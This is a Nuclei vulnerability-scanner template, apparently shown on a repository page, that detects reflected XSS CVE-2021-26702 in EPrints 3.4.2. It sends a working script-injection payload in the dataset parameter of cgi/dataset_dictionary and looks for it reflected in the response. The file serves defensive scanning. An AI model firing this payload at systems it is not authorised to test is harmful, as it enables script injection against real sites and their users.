nuclei-templates/cves/2021/CVE-2021-26702.yaml

37 lines
961 B
YAML
Raw Normal View History

2022-07-05 17:36:53 +00:00
id: CVE-2021-26702
info:
name: EPrints 3.4.2 XSS
author: ritikchaddha
severity: medium
description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI.
reference:
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
- https://files.eprints.org/2548/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-26702
cwe-id: CWE-79
2022-07-05 17:36:53 +00:00
tags: cve,cve2021,xss,eprints
requests:
- method: GET
path:
2022-07-10 05:05:24 +00:00
- "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-07-05 17:36:53 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-07-10 05:05:24 +00:00
- "</script><script>alert(document.domain)</script>"
2022-07-05 17:36:53 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200